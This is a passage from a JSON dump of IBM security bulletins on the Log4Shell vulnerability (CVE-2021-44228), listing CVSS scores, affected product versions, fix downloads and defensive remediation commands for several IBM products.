"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T16:49:17", "id": "6DD517DD7F557A31BB9EF8B8E2970701E7EBF9E1168A77A02C5EFC57A29C1AE3", "href": "https://www.ibm.com/support/pages/node/6527188", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:33", "description": "## Summary\n\nCrypto Hardware Initialization and Maintenance (CHIM 3.0.0) as shipped with CCA 7.2.55 for MTM 4769 is affected by a vulnerability in Apache Log4J (CVE-2021-44228). CHIM is using Apache Log4J for internal logging purposes of regular user activity.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCrypto Hardware Initialization and Maintenance (CHIM)| CHIM 3.0.0 for CCA 7.2.55 for MTM 4769 (setup4769_7.2.55.bin) \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading: \n\nProduct(s)| Fixed Version(s) \n---|--- \nCrypto Hardware Initialization and Maintenance (CHIM)| CHIM 3.0.1 for CCA 7.2.55 for MTM 4769 (setup4769_chim_log4j_patch_7.2.55.bin) \n \n## Workarounds and Mitigations\n\nFor local administrative purposes the Crypto Node Management (CNM) tool can be used instead of Crypto Hardware Initialization and Maintenance (CHIM) for most administrative tasks.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nCCA Software Download Page: <https://www.ibm.com/security/cryptocards/pciecc4/software>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n04 January 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HW19X\",\"label\":\"Other xSeries\"},\"Component\":\"MTM 4769 - Crypto Hardware Installation and Maintenance Tool\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"MTM 4769 - CHIM 3.0.0.x\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T16:53:29", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4J adressed in Crypto Hardware Initialization and Maintenance (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], 
"modified": "2022-01-04T16:53:29", "id": "4D6D019876F2EE83F308FCD9E27F7FE176603A605EC9CDF1DBCD5C5C9951EDE5", "href": "https://www.ibm.com/support/pages/node/6538138", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:40:58", "description": "## Summary\n\nA vulnerability was identified within the Apache Log4j library that is used by IBM Cloud Pak for Watson AIOps. This vulnerability has been addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nICP - Watson AIOps| 1.0.x \nICP - Watson AIOps| 2.0.x \nICP - Watson AIOps| 2.1.x \nICP - Watson AIOps| 3.x \n \n\n\n## Remediation/Fixes\n\nInstall the fix for this CVE by installing Interim Fix [HF19458](<https://ibm.biz/BdfTYV>)\n\n## Workarounds and Mitigations\n\nIBM strongly recommends to apply the interim fix now.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSJGDOB\",\"label\":\"IBM Watson AIOps\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"3.2.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T18:28:18", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Cloud Pak for Watson AIOps (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-05T18:28:18", "id": 
"4EB30F982289A93326697168C61CCD073ED91E21FFACB7414B6EA10DBFA0E2B0", "href": "https://www.ibm.com/support/pages/node/6529258", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-10T05:27:16", "description": "## Summary\n\nThere is vulnerability in Apache Log4j used by Content Manager OnDemand z/OS. Content Manager OnDemand z/OS has addressed the applicable CVE. [CVE-2021-44228]\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Manager OnDemand for z/OS| 10.1.x \nContent Manager OnDemand for z/OS| 10.5.x \n \n## Remediation/Fixes\n\nPlease go to ShopZ or use normal ordering process from the z system\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSQHWE\",\"label\":\"Content Manager OnDemand for z\\/OS\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF035\",\"label\":\"z\\/OS\"}],\"Version\":\"10.x\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-10T06:20:13", "type": "ibm", "title": "Security Bulletin: There is vulnerability in Apache Log4j used by Content Manager OnDemand z/OS. 
Content Manager OnDemand z/OS has addressed the applicable CVE [CVE-2021-44228]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-10-10T06:20:13", "id": "AF14D81F9945B81EA39B6923FB2CB4E62949A34EE9CCFEF7120D6D6700FA48A1", "href": "https://www.ibm.com/support/pages/node/6825877", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-05T21:30:02", "description": "## Summary\n\nLog4j is used by IBM Cloud Transformation Advisor for generating logs in some components and tools. This bulletin provides a remediation for the reported CVE-2021-44228 by upgrading IBM Cloud Transformation Advisor version to 2.5.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Transformation Advisor| 2.5.0 \n \n\n\n## Remediation/Fixes\n\nUpgrade to 2.5.1 or later. \n\nIBM Cloud Transformation Advisor can be installed from OperatorHub page in Red Hat OpenShift Container Platform or locally following this [link](<https://www.ibm.com/cloud/architecture/tutorials/install-ibm-transformation-advisor-local> \"link\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS5Q6W\",\"label\":\"IBM Cloud Transformation Advisor\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-05T19:00:57", "type": "ibm", "title": "Security Bulletin: IBM Cloud Transformation Advisor is affected by Apache Log4j vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-12-05T19:00:57", "id": 
"558ED6F880AE90E6CA233933ED947E6F8B2EFF2613CBD4FECB6553DBCB9609BA", "href": "https://www.ibm.com/support/pages/node/6526212", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:19", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library used by IBM Financial Crimes Insight for Claims Fraud for generating logs in some of its components. This bulletin provides mitigations for the Log4Shell vulnerability (CVE-2021-44228) by applying the applicable workaround steps to IBM Financial Crimes Insight for Claims Fraud.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCounter Fraud Management - Banking| All \n \n\n\n## Remediation/Fixes\n\nNone\u200b\n\n## Workarounds and Mitigations\n\nThe recommended solution is to apply the fix for Elastic Search and Hadoop as in steps below as soon as possible.\n\n**Steps for Elastic Search:**\n\nTo fix the log4j vulnerability in Elastic Search for IBM Financial Crimes Insight for Claims Fraud, complete the following steps:\n\n 1. Log into OpenShift cluster using `oc login` from Ambari server.\n 2. Ensure all Elastic Search pods are healthy and Running. \n \n oc get po | grep fci-elasticsearch\n\n 3. Set the `JVM` property to apply log4j fix. To set, complete the following commands. 
\n \n oc patch sts fci-elasticsearch-master -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n oc patch sts fci-elasticsearch-data -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n oc patch sts fci-elasticsearch-client -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n\nThe Elastic Search pods are restarted automatically after the commands are executed.\n\n 4. Ensure all Elastic search pods are restarted. \n \n oc get po | grep fci-elasticsearch\n\n 5. Verify if the log4j fix is applied successfully. The JVM process starts with a new JVM argument `-Dlog4j2.formatMsgNoLookups=true`. \n \n oc exec fci-elasticsearch-data-0 -- ps aux\n oc exec fci-elasticsearch-master-0 -- ps aux\n\n\n\n**Steps for Hadoop:**\n\nTo fix the log4j vulnerability in Hadoop for IBM Financial Crimes Insight for Claims Fraud, complete the following steps:\n\n 1. 1. Download the [cloudera-scripts-for-log4j-main.zip](<https://github.com/cloudera/cloudera-scripts-for-log4j/archive/refs/heads/main.zip>) file.\n 2. Copy it to all the Hadoop nodes.\n 3. Do the following steps for every Hadoop nodes: \n\n 1. Copy the `cloudera-scripts-for-log4j-main.zip` file to the `/root/`.\n 2. Run the below commands to extract the `.zip` file: \n \n cd /root\n unzip cloudera-scripts-for-log4j-main.zip\n\n 3. Run the below command and note down the folder names, such as `/usr`, `/fcigraph`, and `/grid`. \n \n find / -name log4j*.jar > list_of_impacted_jars.txt\n\n 4. Create a backup folder with the below command. \n \n mkdir /log4j_backup\n\n 5. 
Run the following command for each folder found in the preceding step to apply the fix: \n \n ./run_log4j_patcher.sh hdp -t /usr/ -b /log4j_backup > patch.log 2>&1 &\n\n**Note**: In the above command, replace `/usr/` with the folder names at the preceding step, such as `/fcigraph/`, `/grid/`, etc.\n\nThis process may take 10 to 15 minutes.\n\n 4. Run the following commans to verify: \n \n cd /log4j_backup\n find . -name *.backup\n\n**Note**: This lists all the impacted `.jar` files that are patched, and the list matches the list_of_impacted_jars.txt.\n\n 5. Restart the impacted services from Ambari console (`hive` and `oozie`).\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SS3QGT\",\"label\":\"IBM Financial Crimes Insight\"},\"Component\":\"FCI, DD, Surveillance, CFM - Banking, Healthcare, Insurance, Government\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T05:58:43", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects the components (Elastic Search and Hadoop) of IBM Financial Crimes Insight for Claims Fraud", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T05:58:43", "id": "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "href": "https://www.ibm.com/support/pages/node/6528874", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:45", "description": "## Summary\n\nApache Log4j is used by the QMF Vision component of IBM QMF Analytics for Multiplatforms as part of its logging infrastructure and is vulnerable to arbitrary code execution (CVE-2021-44228). The fix includes Apache Log4j v2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM QMF Analytics for Multiplatforms - QMF Vision| 12.1, 12.2.0.x \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now. Apache Log4j is upgraded to v2.17.0 in the following fix, which is downloadable from Fix Central. 
\n\n**Product Component**| **Download URL** \n---|--- \nQMF Vision| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/IBM+QMF+Analytics+for+Multiplatforms&release=All&platform=All&function=fixId&fixids=qmf_mp_vision_v12205_Interim_Fix_2&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/IBM+QMF+Analytics+for+Multiplatforms&release=All&platform=All&function=fixId&fixids=qmf_mp_vision_v12205_Interim_Fix_2&includeSupersedes=0&source=fc>) \n \n## Workarounds and Mitigations\n\nSee the Remediation/Fixes section. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n12 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6QWT\",\"label\":\"IBM QMF Analytics for Multiplatforms\"},\"Component\":\"QMF Vision\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"12.2.0.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T00:04:01", "type": "ibm", "title": "Security Bulletin: IBM QMF Analytics for Multiplatforms is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
